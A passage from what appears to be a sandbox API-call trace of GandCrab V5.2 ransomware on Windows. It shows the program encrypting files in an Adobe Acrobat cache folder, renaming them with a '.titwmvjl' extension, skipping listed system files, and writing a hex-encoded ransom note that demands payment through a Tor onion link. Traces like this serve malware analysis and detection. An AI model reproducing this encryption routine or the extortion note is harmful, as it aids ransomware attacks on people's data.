dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0069.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.332] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0069.333] GetLastError () returned 0x0 [0069.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.333] CryptDestroyKey (hKey=0x503738) returned 1 [0069.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.333] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.333] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.333] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.333] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x16, lpOverlapped=0x0) returned 1 [0069.340] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffffea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.340] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x16, lpOverlapped=0x0) returned 1 [0069.343] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.343] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0069.346] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.350] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.350] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.350] CloseHandle (hObject=0x2d4) returned 1 [0069.351] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobData.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globdata.titwmvjl"), dwFlags=0x1) returned 1 [0069.352] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.352] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.352] lstrcmpW (lpString1="GlobSettings", lpString2=".") returned 1 [0069.352] lstrcmpW (lpString1="GlobSettings", lpString2="..") returned 1 [0069.352] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="GlobSettings" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" [0069.352] lstrlenW (lpString=".titwmvjl") returned 9 [0069.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0069.352] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.352] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.titwmvjl") returned 84 [0069.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0069.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0069.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="desktop.ini") returned 1 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="autorun.inf") returned 1 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="ntuser.dat") returned -1 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="iconcache.db") returned -1 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="bootsect.bak") returned 1 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="boot.ini") returned 1 [0069.352] lstrcmpiW (lpString1="GlobSettings", lpString2="ntuser.dat.log") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="thumbs.db") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="KRAB-DECRYPT.html") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="CRAB-DECRYPT.html") returned 1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="KRAB-DECRYPT.txt") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="CRAB-DECRYPT.txt") returned 1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="ntldr") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="NTDETECT.COM") returned -1 [0069.353] lstrcmpiW (lpString1="GlobSettings", lpString2="Bootfont.bin") returned 1 [0069.353] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings") returned 75 [0069.353] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.353] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0069.354] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0069.354] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.354] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0069.354] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.355] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.355] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.355] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0069.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.355] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.355] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.355] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0069.356] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.356] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.356] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.356] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0069.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.356] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.356] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.357] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0069.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.357] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503378) returned 1 [0069.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.357] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0069.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.357] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0069.358] GetLastError () returned 0x0 [0069.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.358] CryptDestroyKey (hKey=0x503378) returned 1 [0069.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.358] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.358] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0069.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.359] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0069.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.359] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0069.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.359] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0069.359] GetLastError () returned 0x0 [0069.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.360] CryptDestroyKey (hKey=0x503738) returned 1 [0069.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.360] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.360] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.360] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.360] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x18, lpOverlapped=0x0) returned 1 [0069.368] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.368] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x18, lpOverlapped=0x0) returned 1 [0069.370] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.370] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0069.371] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.375] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.376] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.376] CloseHandle (hObject=0x2d4) returned 1 [0069.377] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\GlobSettings.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\globsettings.titwmvjl"), dwFlags=0x1) returned 1 [0069.377] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.378] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.378] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.381] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.382] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt" [0069.382] lstrlenW (lpString=".titwmvjl") returned 9 [0069.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt") returned 83 [0069.382] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.382] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 92 [0069.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt") returned 83 [0069.382] lstrlenW (lpString=".txt") returned 4 [0069.382] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.382] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.382] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.382] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt") returned 83 [0069.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\TITWMVJL-DECRYPT.txt") returned 83 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.382] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.383] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.383] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.383] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0069.383] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0069.383] CloseHandle (hObject=0x2cc) returned 1 [0069.383] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.383] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0069.383] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0069.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="Security" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0069.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\" [0069.384] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.384] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.385] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.385] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.385] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.385] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\\\TITWMVJL-DECRYPT.txt") returned 85 [0069.385] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0069.385] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\